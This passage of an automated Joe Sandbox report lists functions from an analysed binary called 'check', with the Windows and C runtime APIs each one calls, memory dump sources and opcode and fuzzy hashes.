Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction ID: 4c02bdebe9023d4c84372e6e63a8c1b75b759abb50fc618b750bb59477cfd45d
Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
Instruction Fuzzy Hash: C491A132E18A5285F7A09F6594403BD6BA0AB64FA8F544139EE1E97AC5DF3CF482C700

Function 00007FF61E8FF98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF61E8FFA7C
_get_daylight.LIBCMT ref: 00007FF61E8FFA8D
_get_daylight.LIBCMT ref: 00007FF61E8FFA9E
_isindst.LIBCMT ref: 00007FF61E8FFB69

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: f558e89c442362ee9d5ecf949e13c1c52976355667aff1e5293e7f518e882bc8
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: 34510472F04A128AEB64CF6499616BC27A5AF64B78F500235FD1E92AE5DF3CF442C740

Function 00007FF61E8F577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF61E8F57AF
GetFileInformationByHandle.KERNELBASE ref: 00007FF61E8F5811
GetLastError.KERNEL32 ref: 00007FF61E8F58A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8F56B4), ref: 00007FF61E8F58EE

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
Instruction ID: 454877dbbd339d6df522d500482e9e9a488e2ec81d24594dcef0d817f631b3fb
Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
Instruction Fuzzy Hash: 86518E32E18A418AFB94CF71E4503BD37A5AB68F68F144435EE0D97689DF3CE8418720

Function 00007FF61E8F5628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F5655
CreateFileW.KERNELBASE ref: 00007FF61E8F5694
CloseHandle.KERNEL32 ref: 00007FF61E8F56C9

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction ID: 8cbbb1a6237784e4fa2b2da9bf532ec3b72f8409f56f1449294e8423b306a78f
Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
Instruction Fuzzy Hash: A6417322D18B8283E7948B6095503696760FBA4BB4F109335F66D83AD6EF7CF5E08750

Function 00007FF61E8ECC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61E8ECE0C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF61E8ECE20

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF61E8ECC60
__scrt_release_startup_lock.LIBCMT ref: 00007FF61E8ECCCE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF61E8ECD21

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 7662534ecdc97d6342c3e0d7e722e165cf5bb1cfcc07ddf2744ed34bc55cb2d4
Instruction ID: 6b308c802c33ae097a27d0f83543bfc2219f60dbb703b06216ec299f3fe30ca7
Opcode Fuzzy Hash: 7662534ecdc97d6342c3e0d7e722e165cf5bb1cfcc07ddf2744ed34bc55cb2d4
Instruction Fuzzy Hash: 1F314C21E0CE8745FAD9AB7694123B92681AF71FA4F485434F90EDB2D3EE6DF904C201

Function 00007FF61E8F9A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF61E8F9A2C), ref: 00007FF61E8F9A41
TerminateProcess.KERNEL32(?,?,?,00007FF61E8F9A2C), ref: 00007FF61E8F9A4C
ExitProcess.KERNEL32 ref: 00007FF61E8F9A5B

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction ID: a93cee7d19c051f4666f7f252ca68bb2e09f42bb41f1d44f9e7197180edecbf0
Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
Instruction Fuzzy Hash: 84D09E20B48F0642EB982FB05C5507812596FA8F21F581838E80BC6393FD2CF84D4300

Function 00007FF61E8F013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F0180
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F0277

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 4868be33f20bb310f0abd35bcc3862f1632fd4453bc536289865619c136b0eb3
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: 8051F721B09A428EFBA89A65940067A66D1BFA4FB4F184734FD7DC37D6CE3CF4429600

Function 00007FF61E8FC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF61E8FC2CD), ref: 00007FF61E8FC180
GetLastError.KERNEL32(?,?,?,?,?,00007FF61E8FC2CD), ref: 00007FF61E8FC18A

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction ID: 4d5e0b083eb6f4d11dd63327df85b661a758a420317fc1ff75c23199e3c063d7
Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
Instruction Fuzzy Hash: 95110462A08E8181DB608B25A810169A361AB61FF4F640331FE7D877D9DF3CE1508704

Function 00007FF61E8F5924 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8F5839), ref: 00007FF61E8F5957
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61E8F5839), ref: 00007FF61E8F596D

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction ID: 431c9b4c97a666930ce12976f60352d88213529d3baa2bae8ed54b8c063a055b
Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
Instruction Fuzzy Hash: 2A11913160CB4282EB988B15B41103EB760FB94BB1F601236FA9EC19D8EF2CE454DB10

Function 00007FF61E8FA948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA95E
GetLastError.KERNEL32(?,?,?,00007FF61E902D22,?,?,?,00007FF61E902D5F,?,?,00000000,00007FF61E903225,?,?,?,00007FF61E903157), ref: 00007FF61E8FA968

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction ID: 72e064e628bd2f42a97a3462ca5a34df7f4fab804c24a72e8da4de7da810ecab
Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
Instruction Fuzzy Hash: 8FE08C60F19E0342FF58ABF2A8551381250AFB8F30F844435F81EC22A2EE2CF8868310

Function 00007FF61E8FAB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF61E8FA9D5,?,?,00000000,00007FF61E8FAA8A), ref: 00007FF61E8FABC6
GetLastError.KERNEL32(?,?,?,00007FF61E8FA9D5,?,?,00000000,00007FF61E8FAA8A), ref: 00007FF61E8FABD0

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction ID: a7b14fc9c6fa3f35fd5f2477022c2c0296261721d7637198d71004bb4e66a138
Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
Instruction Fuzzy Hash: 4C21A121F18E8241EFE09761949537992829FA4FF0F1842B9FA2EC77D2DE6CF4414300

Function 00007FF61E8FBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8FBED4

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction ID: 910bf5020e47e32eb3ecbf1229b9489eeace45948e6f272249fb7ae63f1c0ae6
Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
Instruction Fuzzy Hash: 83418232918A4587EAA4DA29E55027973A0EB69FA4F140131F69FC36D1CF6CF8428B51

Function 00007FF61E8E7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF61E8E803A

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 18b2c4858c0edfd7677dd7e37cbff4feffd99745866a20de9e73d591d5ddfdc1
Instruction ID: 67216b4bead44fe4987a73402a4ce936da30cfa20a326274e9823f3974ec4298
Opcode Fuzzy Hash: 18b2c4858c0edfd7677dd7e37cbff4feffd99745866a20de9e73d591d5ddfdc1
Instruction Fuzzy Hash: F0218222B29E9146FA909A2365043BE9651BFA5FE4F8C4430FE0D87786CE7DF441C200

Function 00007FF61E8FB93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8FB9C2

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction ID: a6aa29d1a9aa396791fc03a97d369f8daef61fe19472ab17d0bb4eb69d7605ec
Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
Instruction Fuzzy Hash: 76314F32A28E1285F791AB59884137C2A90AFA0FB5F520136F95E877D2DE7CFC418711

Function 00007FF61E8F9961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF61E8F998F

Part of subcall function 00007FF61E8F9A88: GetModuleHandleExW.KERNEL32 ref: 00007FF61E8F9AAD
Part of subcall function 00007FF61E8F9A88: GetProcAddress.KERNEL32 ref: 00007FF61E8F9AC3
Part of subcall function 00007FF61E8F9A88: FreeLibrary.KERNEL32 ref: 00007FF61E8F9AEA

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction ID: ceb6c56cf455804ad90193e4ecc82d89cf10bfa879a6b279aa695cb0df6fd418
Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
Instruction Fuzzy Hash: 4E218172B14B4589EBA48FA4C4806EC33B4FB54B28F584636E76D86AD6DF3CE544C740

Function 00007FF61E8F5F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F5EF9

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: e82b4ff45466638cdc35ba9e6df2b2daaf9f90d3ddbac5a9c044e548598d85df
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: A311A531A2CE4182EAE09F15941017DA6A0FFA5FA4F454431FA8CD7B96CF7CF8008760

Function 00007FF61E906354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E906377

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: d3fad0549c93ed9f059b5bd0368e1a5bc2ffddee8b9ab894bb9366336541800e
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 81214132A18E4186EB618F18D44037976A4BBA4F64F644634FA5DC7AD7DF3DE4118B40

Function 00007FF61E8F03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61E8F0410

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: 58066d4939653aa9ce6084ded8d63b232fc2ce1d4da1e7f8eaf8ddd51627b948
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: EA01A161A18B4180EE84DF529A00069A695BFB5FF4F484631FE6C93BD6CE3CF8028300

Function 00007FF61E8F5410 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61E8FF2A4: DeleteCriticalSection.KERNEL32 ref: 00007FF61E8FF317

DeleteCriticalSection.KERNEL32 ref: 00007FF61E8F5441

Memory Dump Source

Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true

Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd

Similarity

